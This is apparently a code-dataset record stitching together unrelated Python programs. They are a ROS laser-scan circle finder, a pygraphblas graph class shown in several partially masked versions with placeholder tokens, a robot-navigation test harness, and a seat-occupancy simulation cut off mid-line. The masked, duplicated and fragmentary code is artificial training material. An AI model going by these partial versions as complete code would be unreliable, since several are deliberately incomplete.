the two ends of the scan together.\n# This will not be an issue with the robots as they only take 180 degree scans.\n\n# Ros imports.\nimport roslib; \nroslib.load_manifest('circleFinder')\nimport rospy\nfrom sensor_msgs.msg import LaserScan\nfrom roslib.rostime import Duration \n\n# Python lib imports.\nimport math\nimport time\n\n# Message imports\nfrom circleFinder.msg import *\n\n# Local file imports.\nfrom placment_funcs import *\nfrom data_parser import *\n\n# plot functions are in here. Remove if you dont want and you might free up \n# some memory.\nfrom plot_funcs import *\n\n\n#-------------------------------------------------------------------------------\n# Function: callback\n#\n# Thread created when a laser scan is received on a listening topic and extract \n# and publish a specified number of circle from the data.\n#\n#-------------------------------------------------------------------------------\n#\n# args - An array of arguments. The form is: \n# max_dist - the maximum distance to look for circles. If a sample or \n# circle edge goes beyond this then it will be ignored.\n# max_rad - The maximum radius that a valid circle can have.\n# min_rad - The minimum radius that a valid circle can have.\n# grad_tol - The tolerance used in the prune function.\n# split_multi - The multiplier used in the split function\n#\n# publish - A circleArray object containing the circle data in an array of \n# circleEntry objects. 
These classes are defined in the \n# circleFinder/msg path.\n#-------------------------------------------------------------------------------\ndef callback(data, args):\n tStart = time.time()\n \n pub = args[0]\n max_dist = args[1]\n max_rad = args[2]\n min_rad = args[3]\n grad_tol = args[4]\n split_multi = args[5]\n prune_lines = args[6]\n plot = args[7]\n \n \n # Get possible circle data.\n possibles = dataParser(data,max_dist, grad_tol, split_multi, prune_lines)\n \n # Calculate the circle info from that data.\n circles = []\n for i in possibles:\n current = matchCirc(list(i), False)\n if current is not None:\n #prune out any circles that are too large or small\n if current[1] > max_rad or \\\n current[1] < min_rad or \\\n math.sqrt(math.pow(current[0][0],2) + math.pow(current[0][1],2)) + current[1] > max_dist:\n pass\n else:\n circles.append(current)\n \n # Setup circleArray and publish found circles.\n ret = []\n for i in circles:\n c = circleEntry()\n c.x = i[0][0]\n c.y = i[0][1]\n c.distance = math.sqrt(i[0][0]*i[0][0] + i[0][1] * i[0][1])\n c.theta = math.atan2(i[0][1], i[0][0])\n c.radius = i[1]\n ret.append(c)\n m = circleArray()\n m.broadcastTime = rospy.get_rostime()\n m.duration = time.time() - tStart\n m.array = ret\n if not rospy.is_shutdown():\n pub.publish(m)\n \n if plot:\n import matplotlib.pyplot as plt\n plotWorld(data, 30, True, 'ro')\n for i in circles:\n plotCircle((i[0])[0],(i[0])[1],i[1])\n for i in possibles:\n for u in i:\n plt.plot(u[0], u[1], 'bo')\n plt.plot(0,0,'ro')\n plotAxis(8,-8,8,-8,4)\n plt.axis([-8,8,-8,8])\n plt.show()\n\n\n\n#-------------------------------------------------------------------------------\n# Function: main\n#\n# Sets up the callback function and then idles.\n#\n# Program arguments are inside. 
\n#\n#-------------------------------------------------------------------------------\nif __name__ == '__main__':\n #print dir()\n \n # the publiser\n pub = rospy.Publisher(\"circles\", circleArray)\n \n # The maximum distance from the origin that a sample point or circle edge \n # can be before they are considered invalid.\n max_dist = 7\n \n # The maximum radius a circle can be before it is considered invalid.\n max_rad = 0.25\n \n # The maximum radius a circle can be before it is considered invalid.\n min_rad = 0\n \n # See the prune function in data_parser.py\n grad_tol = 0.3\n \n # See the split function in data_parser.py\n split_multi = 2.5\n \n # If true then an attempt to remove straight edges from the data will be \n # made.\n prune_lines = True\n \n # Plot flag.\n plot = False\n \n import sys\n if (len(sys.argv) > 1):\n for i in sys.argv:\n if i == '--plot':\n plot = True\n elif i == '--no-line-pruning':\n prune_lines = False\n \n args = [pub, max_dist, max_rad, min_rad, grad_tol, split_multi, prune_lines , plot]\n print \"--------------------------------------------------------------------------------\"\n print \"Circle Finder\"\n print\n print \"--------------------------------------------------------------------------------\"\n print \"Command line arguments are:\"\n print \" --plot Will cause the outcome of the first scan to be plotted.\"\n print \" --no-line-pruning Will prevent straight lines from being removed from the\" \n print \" scan.\"\n print\n print \"--------------------------------------------------------------------------------\"\n print \"Starting circle finder with arguments:\"\n print\n print \" Publisher: \" , pub\n print \" Maximum Distance: \" , max_dist\n print \" Maximum Radius: \" , max_rad\n print \" Minimum Radius: \" , min_rad\n print \" Gradient Tolerance: \" , grad_tol\n print \" Split Multiplier: \" , split_multi\n print \" Remove Lines: \" , prune_lines \n print \" Plot: \" , plot\n print\n print \"--------------------------------------------------------------------------------\"\n print \"To increase speed, the listening thread is not verbose.\"\n print \"Ctrl+C to exit.\"\n rospy.init_node('circles', anonymous=True)\n rospy.Subscriber(\"base_scan\",LaserScan, callback, callback_args=args)\n rospy.Subscriber(\"scan\",LaserScan, callback, callback_args=args)\n rospy.spin()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class Graph:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def transitive_closure_1(self):
adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
for label_matrix in self.label_matrices.values():
adj_matrix += label_matrix
if adj_matrix.nvals != 0:
while True:
old = adj_matrix.nvals
adj_matrix += adj_matrix @ adj_matrix
                if old == adj_matrix.nvals:
break
return adj_matrix
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_by_label(self, label):
if label not in self.label_matrices.keys():
self.label_matrices[label] = Matrix.sparse(BOOL, self.
n_vertices, self.n_vertices)
return self.label_matrices[label]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Graph:
<|reserved_special_token_0|>
def from_trans(self, filename):
input_file = open(filename)
edges = input_file.read().rstrip().split('\n')
input_file.close()
max_vertice_number = 0
for edge in edges:
fro, label, to = edge.split(' ')
max_vertice_number = max(max_vertice_number, int(fro))
max_vertice_number = max(max_vertice_number, int(to))
self.n_vertices = max_vertice_number + 1
for edge in edges:
fro, label, to = edge.split(' ')
self.get_by_label(label)[int(fro), int(to)] = True
def from_regex(self, filename):
input_file = open(filename)
regex = Regex(input_file.read().rstrip())
dfa = regex.to_epsilon_nfa().to_deterministic().minimize()
self.n_vertices = len(dfa.states)
state_renumeration = dict()
i = 0
for state in dfa.states:
state_renumeration[state] = i
i += 1
for fro, label, to in dfa._transition_function.get_edges():
self.get_by_label(str(label))[state_renumeration[fro],
state_renumeration[to]] = True
self.start_vertices.add(state_renumeration[dfa.start_state])
for state in dfa.final_states:
self.final_vertices.add(state_renumeration[state])
def transitive_closure_1(self):
adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
for label_matrix in self.label_matrices.values():
adj_matrix += label_matrix
if adj_matrix.nvals != 0:
while True:
old = adj_matrix.nvals
adj_matrix += adj_matrix @ adj_matrix
                if old == adj_matrix.nvals:
break
return adj_matrix
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_by_label(self, label):
if label not in self.label_matrices.keys():
self.label_matrices[label] = Matrix.sparse(BOOL, self.
n_vertices, self.n_vertices)
return self.label_matrices[label]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Graph:
def __init__(self):
self.n_vertices = 0
self.label_matrices = dict()
self.start_vertices = set()
self.final_vertices = set()
def from_trans(self, filename):
input_file = open(filename)
edges = input_file.read().rstrip().split('\n')
input_file.close()
max_vertice_number = 0
for edge in edges:
fro, label, to = edge.split(' ')
max_vertice_number = max(max_vertice_number, int(fro))
max_vertice_number = max(max_vertice_number, int(to))
self.n_vertices = max_vertice_number + 1
for edge in edges:
fro, label, to = edge.split(' ')
self.get_by_label(label)[int(fro), int(to)] = True
def from_regex(self, filename):
input_file = open(filename)
regex = Regex(input_file.read().rstrip())
dfa = regex.to_epsilon_nfa().to_deterministic().minimize()
self.n_vertices = len(dfa.states)
state_renumeration = dict()
i = 0
for state in dfa.states:
state_renumeration[state] = i
i += 1
for fro, label, to in dfa._transition_function.get_edges():
self.get_by_label(str(label))[state_renumeration[fro],
state_renumeration[to]] = True
self.start_vertices.add(state_renumeration[dfa.start_state])
for state in dfa.final_states:
self.final_vertices.add(state_renumeration[state])
def transitive_closure_1(self):
adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
for label_matrix in self.label_matrices.values():
adj_matrix += label_matrix
if adj_matrix.nvals != 0:
while True:
old = adj_matrix.nvals
adj_matrix += adj_matrix @ adj_matrix
                if old == adj_matrix.nvals:
break
return adj_matrix
    def transitive_closure_2(self):
        adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
        result = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
        for label_matrix in self.label_matrices.values():
            adj_matrix += label_matrix
        result += adj_matrix
        if adj_matrix.nvals != 0:
            while True:
                old = result.nvals
                # extend known paths by one edge until no new pairs appear
                result += result @ adj_matrix
                if old == result.nvals:
                    break
        return result
def labels(self):
return self.label_matrices.keys()
def get_by_label(self, label):
if label not in self.label_matrices.keys():
self.label_matrices[label] = Matrix.sparse(BOOL, self.
n_vertices, self.n_vertices)
return self.label_matrices[label]
<|reserved_special_token_1|>
from pygraphblas.matrix import Matrix
from pygraphblas.types import BOOL
from pyformlang.regular_expression import Regex
class Graph:
def __init__(self):
self.n_vertices = 0
self.label_matrices = dict()
self.start_vertices = set()
self.final_vertices = set()
def from_trans(self, filename):
input_file = open(filename)
edges = input_file.read().rstrip().split('\n')
input_file.close()
max_vertice_number = 0
for edge in edges:
fro, label, to = edge.split(' ')
max_vertice_number = max(max_vertice_number, int(fro))
max_vertice_number = max(max_vertice_number, int(to))
self.n_vertices = max_vertice_number + 1
for edge in edges:
fro, label, to = edge.split(' ')
self.get_by_label(label)[int(fro), int(to)] = True
def from_regex(self, filename):
input_file = open(filename)
regex = Regex(input_file.read().rstrip())
dfa = regex.to_epsilon_nfa().to_deterministic().minimize()
self.n_vertices = len(dfa.states)
state_renumeration = dict()
i = 0
for state in dfa.states:
state_renumeration[state] = i
i += 1
for fro, label, to in dfa._transition_function.get_edges():
self.get_by_label(str(label))[state_renumeration[fro],
state_renumeration[to]] = True
self.start_vertices.add(state_renumeration[dfa.start_state])
for state in dfa.final_states:
self.final_vertices.add(state_renumeration[state])
def transitive_closure_1(self):
adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
for label_matrix in self.label_matrices.values():
adj_matrix += label_matrix
if adj_matrix.nvals != 0:
while True:
old = adj_matrix.nvals
adj_matrix += adj_matrix @ adj_matrix
                if old == adj_matrix.nvals:
break
return adj_matrix
    def transitive_closure_2(self):
        adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
        result = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
        for label_matrix in self.label_matrices.values():
            adj_matrix += label_matrix
        result += adj_matrix
        if adj_matrix.nvals != 0:
            while True:
                old = result.nvals
                # extend known paths by one edge until no new pairs appear
                result += result @ adj_matrix
                if old == result.nvals:
                    break
        return result
def labels(self):
return self.label_matrices.keys()
def get_by_label(self, label):
if label not in self.label_matrices.keys():
self.label_matrices[label] = Matrix.sparse(BOOL, self.
n_vertices, self.n_vertices)
return self.label_matrices[label]
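

# A minimal usage sketch (an addition), assuming an edge-list file exists;
# 'edges.txt' is a hypothetical name, not part of the original module.
if __name__ == '__main__':
    g = Graph()
    g.from_trans('edges.txt')  # hypothetical input: lines of "<from> <label> <to>"
    closure = g.transitive_closure_1()
    print(closure.nvals, 'reachable vertex pairs')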
|
flexible
|
{
"blob_id": "2ccc3bb63445572610f6dbdfe5b1cbeef506c9a9",
"index": 8613,
"step-1": "<mask token>\n\n\nclass Graph:\n <mask token>\n <mask token>\n <mask token>\n\n def transitive_closure_1(self):\n adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n for label_matrix in self.label_matrices.values():\n adj_matrix += label_matrix\n if adj_matrix.nvals != 0:\n while True:\n old = adj_matrix.nvals\n adj_matrix += adj_matrix @ adj_matrix\n if old == adj_matrix:\n break\n return adj_matrix\n <mask token>\n <mask token>\n\n def get_by_label(self, label):\n if label not in self.label_matrices.keys():\n self.label_matrices[label] = Matrix.sparse(BOOL, self.\n n_vertices, self.n_vertices)\n return self.label_matrices[label]\n",
"step-2": "<mask token>\n\n\nclass Graph:\n <mask token>\n\n def from_trans(self, filename):\n input_file = open(filename)\n edges = input_file.read().rstrip().split('\\n')\n input_file.close()\n max_vertice_number = 0\n for edge in edges:\n fro, label, to = edge.split(' ')\n max_vertice_number = max(max_vertice_number, int(fro))\n max_vertice_number = max(max_vertice_number, int(to))\n self.n_vertices = max_vertice_number + 1\n for edge in edges:\n fro, label, to = edge.split(' ')\n self.get_by_label(label)[int(fro), int(to)] = True\n\n def from_regex(self, filename):\n input_file = open(filename)\n regex = Regex(input_file.read().rstrip())\n dfa = regex.to_epsilon_nfa().to_deterministic().minimize()\n self.n_vertices = len(dfa.states)\n state_renumeration = dict()\n i = 0\n for state in dfa.states:\n state_renumeration[state] = i\n i += 1\n for fro, label, to in dfa._transition_function.get_edges():\n self.get_by_label(str(label))[state_renumeration[fro],\n state_renumeration[to]] = True\n self.start_vertices.add(state_renumeration[dfa.start_state])\n for state in dfa.final_states:\n self.final_vertices.add(state_renumeration[state])\n\n def transitive_closure_1(self):\n adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n for label_matrix in self.label_matrices.values():\n adj_matrix += label_matrix\n if adj_matrix.nvals != 0:\n while True:\n old = adj_matrix.nvals\n adj_matrix += adj_matrix @ adj_matrix\n if old == adj_matrix:\n break\n return adj_matrix\n <mask token>\n <mask token>\n\n def get_by_label(self, label):\n if label not in self.label_matrices.keys():\n self.label_matrices[label] = Matrix.sparse(BOOL, self.\n n_vertices, self.n_vertices)\n return self.label_matrices[label]\n",
"step-3": "<mask token>\n\n\nclass Graph:\n\n def __init__(self):\n self.n_vertices = 0\n self.label_matrices = dict()\n self.start_vertices = set()\n self.final_vertices = set()\n\n def from_trans(self, filename):\n input_file = open(filename)\n edges = input_file.read().rstrip().split('\\n')\n input_file.close()\n max_vertice_number = 0\n for edge in edges:\n fro, label, to = edge.split(' ')\n max_vertice_number = max(max_vertice_number, int(fro))\n max_vertice_number = max(max_vertice_number, int(to))\n self.n_vertices = max_vertice_number + 1\n for edge in edges:\n fro, label, to = edge.split(' ')\n self.get_by_label(label)[int(fro), int(to)] = True\n\n def from_regex(self, filename):\n input_file = open(filename)\n regex = Regex(input_file.read().rstrip())\n dfa = regex.to_epsilon_nfa().to_deterministic().minimize()\n self.n_vertices = len(dfa.states)\n state_renumeration = dict()\n i = 0\n for state in dfa.states:\n state_renumeration[state] = i\n i += 1\n for fro, label, to in dfa._transition_function.get_edges():\n self.get_by_label(str(label))[state_renumeration[fro],\n state_renumeration[to]] = True\n self.start_vertices.add(state_renumeration[dfa.start_state])\n for state in dfa.final_states:\n self.final_vertices.add(state_renumeration[state])\n\n def transitive_closure_1(self):\n adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n for label_matrix in self.label_matrices.values():\n adj_matrix += label_matrix\n if adj_matrix.nvals != 0:\n while True:\n old = adj_matrix.nvals\n adj_matrix += adj_matrix @ adj_matrix\n if old == adj_matrix:\n break\n return adj_matrix\n\n def transitive_closure_2(self):\n adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n result = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n for label_matrix in self.label_matrices.values():\n adj_matrix += label_matrix\n if adj_matrix.nvals != 0:\n while True:\n old = result.nvals\n result += adj_matrix\n if old == result.nvals:\n break\n return result\n\n def labels(self):\n return self.label_matrices.keys()\n\n def get_by_label(self, label):\n if label not in self.label_matrices.keys():\n self.label_matrices[label] = Matrix.sparse(BOOL, self.\n n_vertices, self.n_vertices)\n return self.label_matrices[label]\n",
"step-4": "from pygraphblas.matrix import Matrix\nfrom pygraphblas.types import BOOL\nfrom pyformlang.regular_expression import Regex\n\n\nclass Graph:\n\n def __init__(self):\n self.n_vertices = 0\n self.label_matrices = dict()\n self.start_vertices = set()\n self.final_vertices = set()\n\n def from_trans(self, filename):\n input_file = open(filename)\n edges = input_file.read().rstrip().split('\\n')\n input_file.close()\n max_vertice_number = 0\n for edge in edges:\n fro, label, to = edge.split(' ')\n max_vertice_number = max(max_vertice_number, int(fro))\n max_vertice_number = max(max_vertice_number, int(to))\n self.n_vertices = max_vertice_number + 1\n for edge in edges:\n fro, label, to = edge.split(' ')\n self.get_by_label(label)[int(fro), int(to)] = True\n\n def from_regex(self, filename):\n input_file = open(filename)\n regex = Regex(input_file.read().rstrip())\n dfa = regex.to_epsilon_nfa().to_deterministic().minimize()\n self.n_vertices = len(dfa.states)\n state_renumeration = dict()\n i = 0\n for state in dfa.states:\n state_renumeration[state] = i\n i += 1\n for fro, label, to in dfa._transition_function.get_edges():\n self.get_by_label(str(label))[state_renumeration[fro],\n state_renumeration[to]] = True\n self.start_vertices.add(state_renumeration[dfa.start_state])\n for state in dfa.final_states:\n self.final_vertices.add(state_renumeration[state])\n\n def transitive_closure_1(self):\n adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n for label_matrix in self.label_matrices.values():\n adj_matrix += label_matrix\n if adj_matrix.nvals != 0:\n while True:\n old = adj_matrix.nvals\n adj_matrix += adj_matrix @ adj_matrix\n if old == adj_matrix:\n break\n return adj_matrix\n\n def transitive_closure_2(self):\n adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n result = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n for label_matrix in self.label_matrices.values():\n adj_matrix += label_matrix\n if adj_matrix.nvals != 0:\n while True:\n old = result.nvals\n result += adj_matrix\n if old == result.nvals:\n break\n return result\n\n def labels(self):\n return self.label_matrices.keys()\n\n def get_by_label(self, label):\n if label not in self.label_matrices.keys():\n self.label_matrices[label] = Matrix.sparse(BOOL, self.\n n_vertices, self.n_vertices)\n return self.label_matrices[label]\n",
"step-5": null,
"step-ids": [
3,
5,
8,
9
]
}
|
[
3,
5,
8,
9
] |
# -*- coding: utf-8 -*-
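# Test double: a dict-backed stand-in for a robot, storing the values that
# getRayon()/getPosition() return under keys of the same name.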
class Bot(dict):
def __init__(self):
self["getRayon"] = 0
self["getPosition"] = (-1000, -1000)
self.traj = []
def getTrajectoires(self):
return self.traj
def getRayon(self):
return self["getRayon"]
def getPosition(self):
return self["getPosition"]
if __name__ == "__main__":
import sys
import os
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(FILE_DIR, "../../ia"))
sys.path.append(os.path.join(FILE_DIR, "../../libs"))
import time
from graphview import GraphView
from event.goals import navigation
from event import collision
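	# Manual test harness: build two controlled bots and two enemies, load the
	# navigation map, then open a GraphView window to inspect path-finding
	# and collision handling interactively.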
filename = os.path.join(FILE_DIR, "../../ia/event/goals/navigation/map.xml")
try:
offset = sys.argv[1]
except:
offset = 0
start = time.time()
other_bot = Bot()
other_bot.name = 'other'
other_bot["getRayon"] = 200
used_bot = Bot()
used_bot.name = 'used'
used_bot["getRayon"] = 120
ennemy1 = Bot()
ennemy1.name = 'en1'
ennemy2 = Bot()
ennemy2.name = 'en2'
ennemy1["getPosition"] = (1800, 1500)
ennemy1["getRayon"] = 200
ennemy2["getPosition"] = (2200, 500)
ennemy1["getRayon"] = 120
ng = navigation.PathFinding([used_bot, other_bot, ennemy1, ennemy2], filename)
col = collision.Collision([used_bot, other_bot, ennemy1, ennemy2])
print("init time : %s" % (time.time() - start))
v = GraphView(ng, col, other_bot, used_bot)
v.mainloop()
|
normal
|
{
"blob_id": "d178818faf5fb18f5da48c1e2cf7991600731d06",
"index": 4457,
"step-1": "class Bot(dict):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Bot(dict):\n\n def __init__(self):\n self['getRayon'] = 0\n self['getPosition'] = -1000, -1000\n self.traj = []\n\n def getTrajectoires(self):\n return self.traj\n\n def getRayon(self):\n return self['getRayon']\n <mask token>\n\n\n<mask token>\n",
"step-3": "class Bot(dict):\n\n def __init__(self):\n self['getRayon'] = 0\n self['getPosition'] = -1000, -1000\n self.traj = []\n\n def getTrajectoires(self):\n return self.traj\n\n def getRayon(self):\n return self['getRayon']\n\n def getPosition(self):\n return self['getPosition']\n\n\n<mask token>\n",
"step-4": "class Bot(dict):\n\n def __init__(self):\n self['getRayon'] = 0\n self['getPosition'] = -1000, -1000\n self.traj = []\n\n def getTrajectoires(self):\n return self.traj\n\n def getRayon(self):\n return self['getRayon']\n\n def getPosition(self):\n return self['getPosition']\n\n\nif __name__ == '__main__':\n import sys\n import os\n FILE_DIR = os.path.dirname(os.path.abspath(__file__))\n sys.path.append(os.path.join(FILE_DIR, '../../ia'))\n sys.path.append(os.path.join(FILE_DIR, '../../libs'))\n import time\n from graphview import GraphView\n from event.goals import navigation\n from event import collision\n filename = os.path.join(FILE_DIR, '../../ia/event/goals/navigation/map.xml'\n )\n try:\n offset = sys.argv[1]\n except:\n offset = 0\n start = time.time()\n other_bot = Bot()\n other_bot.name = 'other'\n other_bot['getRayon'] = 200\n used_bot = Bot()\n used_bot.name = 'used'\n used_bot['getRayon'] = 120\n ennemy1 = Bot()\n ennemy1.name = 'en1'\n ennemy2 = Bot()\n ennemy2.name = 'en2'\n ennemy1['getPosition'] = 1800, 1500\n ennemy1['getRayon'] = 200\n ennemy2['getPosition'] = 2200, 500\n ennemy1['getRayon'] = 120\n ng = navigation.PathFinding([used_bot, other_bot, ennemy1, ennemy2],\n filename)\n col = collision.Collision([used_bot, other_bot, ennemy1, ennemy2])\n print('init time : %s' % (time.time() - start))\n v = GraphView(ng, col, other_bot, used_bot)\n v.mainloop()\n",
"step-5": "# -*- coding: utf-8 -*-\n\n\nclass Bot(dict):\n\tdef __init__(self):\n\t\tself[\"getRayon\"] = 0\n\t\tself[\"getPosition\"] = (-1000, -1000)\n\t\tself.traj = []\n\tdef getTrajectoires(self):\n\t\treturn self.traj\n\tdef getRayon(self):\n\t\treturn self[\"getRayon\"]\n\tdef getPosition(self):\n\t\treturn self[\"getPosition\"]\n\nif __name__ == \"__main__\":\n\timport sys\n\timport os\n\tFILE_DIR = os.path.dirname(os.path.abspath(__file__))\n\tsys.path.append(os.path.join(FILE_DIR, \"../../ia\"))\n\tsys.path.append(os.path.join(FILE_DIR, \"../../libs\"))\n\t\n\timport time\n\t\n\tfrom graphview import GraphView\n\tfrom event.goals import navigation\n\tfrom event import collision\n\t\n\tfilename = os.path.join(FILE_DIR, \"../../ia/event/goals/navigation/map.xml\")\n\ttry:\n\t\toffset = sys.argv[1]\n\texcept:\n\t\toffset = 0\n\tstart = time.time()\n\tother_bot = Bot()\n\tother_bot.name = 'other'\n\tother_bot[\"getRayon\"] = 200\n\tused_bot = Bot()\n\tused_bot.name = 'used'\n\tused_bot[\"getRayon\"] = 120\n\tennemy1 = Bot()\n\tennemy1.name = 'en1'\n\tennemy2 = Bot()\n\tennemy2.name = 'en2'\n\tennemy1[\"getPosition\"] = (1800, 1500)\n\tennemy1[\"getRayon\"] = 200\n\tennemy2[\"getPosition\"] = (2200, 500)\n\tennemy1[\"getRayon\"] = 120\n\tng = navigation.PathFinding([used_bot, other_bot, ennemy1, ennemy2], filename)\n\tcol = collision.Collision([used_bot, other_bot, ennemy1, ennemy2])\n\tprint(\"init time : %s\" % (time.time() - start))\n\t\n\tv = GraphView(ng, col, other_bot, used_bot)\n\tv.mainloop()\n\n",
"step-ids": [
1,
4,
5,
6,
7
]
}
|
[
1,
4,
5,
6,
7
] |
import sys
def show_data(data):
for line in data:
print(''.join(line))
print("")
def check_seat(data, i, j):
if data[i][j] == '#':
occupied = 1
found = True
elif data[i][j] == 'L':
occupied = 0
found = True
else:
occupied = 0
found = False
return occupied, found
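# Each of the eight scanners below steps repeatedly in one direction and
# reports whether the first visible seat along that line is occupied.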
def is_top_left_occupied(data,i,j):
found = False
occupied = 0
while (i >= 0) and (j >= 0) and (not found):
occupied, found = check_seat(data, i, j)
i -= 1
j -= 1
return occupied
def is_top_occupied(data,i,j):
found = False
occupied = 0
while (j >= 0) and (not found):
occupied, found = check_seat(data, i, j)
j -= 1
return occupied
def is_top_right_occupied(data,i,j):
found = False
occupied = 0
while (i < len(data)) and (j >= 0) and (not found):
occupied, found = check_seat(data, i, j)
i += 1
j -= 1
return occupied
def is_right_occupied(data,i,j):
found = False
occupied = 0
while (i < len(data)) and (not found):
occupied, found = check_seat(data, i, j)
i += 1
return occupied
def is_bottom_right_occupied(data,i,j):
found = False
occupied = 0
while (i < len(data)) and (j < len(data[i])) and (not found):
occupied, found = check_seat(data, i, j)
i += 1
j += 1
return occupied
def is_bottom_occupied(data,i,j):
found = False
occupied = 0
while (j < len(data[0])) and (not found):
occupied, found = check_seat(data, i, j)
j += 1
return occupied
def is_bottom_left_occupied(data,i,j):
found = False
occupied = 0
while (i >= 0) and (j < len(data[i])) and (not found):
occupied, found = check_seat(data, i, j)
i -= 1
j += 1
return occupied
def is_left_occupied(data,i,j):
found = False
occupied = 0
while (i >= 0) and (not found):
occupied, found = check_seat(data, i, j)
i -= 1
return occupied
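# Probe all eight directions around (i, j); each probe contributes 0 or 1.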
def get_occupied_seats(data,i,j):
occupied_seats = ( is_top_left_occupied(data, i-1, j-1) +
is_top_occupied(data, i, j-1) +
is_top_right_occupied(data, i+1, j-1) +
is_right_occupied(data, i+1, j) +
is_bottom_right_occupied(data, i+1, j+1) +
is_bottom_occupied(data, i, j+1) +
is_bottom_left_occupied(data, i-1, j+1) +
is_left_occupied(data, i-1, j) )
# print(occupied_seats)
return occupied_seats
def count_seats(data):
seats = 0
for line in data:
for x in line:
if x == "#": seats += 1
return seats
def main():
with open('input.txt') as f:
lines = f.readlines()
data = [[char for char in line[:-1]] for line in lines]
data_next = [['.' for char in line[:-1]] for line in lines]
end = False
round = 1
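    # An 'L' with zero visible occupied seats becomes '#'; a '#' that sees
    # five or more occupied seats becomes 'L'. Repeat until the grid is stable.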
while not end:
for i in range(0,len(data)):
for j in range(0,len(data[i])):
if (data[i][j] == 'L') and (get_occupied_seats(data,i,j) == 0):
data_next[i][j] = '#'
elif (data[i][j] == '#') and (get_occupied_seats(data,i,j) >= 5):
data_next[i][j] = 'L'
print ("Round %d" % round)
round += 1
if data == data_next:
seats = count_seats(data)
print(seats)
end = True
else:
data = [x[:] for x in data_next]
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "246ec0d6833c9292487cb4d381d2ae82b220677e",
"index": 3969,
"step-1": "<mask token>\n\n\ndef is_top_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n j -= 1\n return occupied\n\n\ndef is_top_occupied(data, i, j):\n found = False\n occupied = 0\n while j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n j -= 1\n return occupied\n\n\n<mask token>\n\n\ndef is_bottom_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j < len(data[i]) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j += 1\n return occupied\n\n\n<mask token>\n\n\ndef get_occupied_seats(data, i, j):\n occupied_seats = is_top_left_occupied(data, i - 1, j - 1\n ) + is_top_occupied(data, i, j - 1) + is_top_right_occupied(data, i +\n 1, j - 1) + is_right_occupied(data, i + 1, j\n ) + is_bottom_right_occupied(data, i + 1, j + 1) + is_bottom_occupied(\n data, i, j + 1) + is_bottom_left_occupied(data, i - 1, j + 1\n ) + is_left_occupied(data, i - 1, j)\n return occupied_seats\n\n\ndef count_seats(data):\n seats = 0\n for line in data:\n for x in line:\n if x == '#':\n seats += 1\n return seats\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef show_data(data):\n for line in data:\n print(''.join(line))\n print('')\n\n\ndef check_seat(data, i, j):\n if data[i][j] == '#':\n occupied = 1\n found = True\n elif data[i][j] == 'L':\n occupied = 0\n found = True\n else:\n occupied = 0\n found = False\n return occupied, found\n\n\ndef is_top_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n j -= 1\n return occupied\n\n\ndef is_top_occupied(data, i, j):\n found = False\n occupied = 0\n while j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n j -= 1\n return occupied\n\n\ndef is_top_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j -= 1\n return occupied\n\n\ndef is_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n return occupied\n\n\ndef is_bottom_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j < len(data[i]) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j += 1\n return occupied\n\n\n<mask token>\n\n\ndef get_occupied_seats(data, i, j):\n occupied_seats = is_top_left_occupied(data, i - 1, j - 1\n ) + is_top_occupied(data, i, j - 1) + is_top_right_occupied(data, i +\n 1, j - 1) + is_right_occupied(data, i + 1, j\n ) + is_bottom_right_occupied(data, i + 1, j + 1) + is_bottom_occupied(\n data, i, j + 1) + is_bottom_left_occupied(data, i - 1, j + 1\n ) + is_left_occupied(data, i - 1, j)\n return occupied_seats\n\n\ndef count_seats(data):\n seats = 0\n for line in data:\n for x in line:\n if x == '#':\n seats += 1\n return seats\n\n\ndef main():\n with open('input.txt') as f:\n lines = f.readlines()\n data = [[char for char in line[:-1]] for line in lines]\n data_next = [['.' for char in line[:-1]] for line in lines]\n end = False\n round = 1\n while not end:\n for i in range(0, len(data)):\n for j in range(0, len(data[i])):\n if data[i][j] == 'L' and get_occupied_seats(data, i, j) == 0:\n data_next[i][j] = '#'\n elif data[i][j] == '#' and get_occupied_seats(data, i, j) >= 5:\n data_next[i][j] = 'L'\n print('Round %d' % round)\n round += 1\n if data == 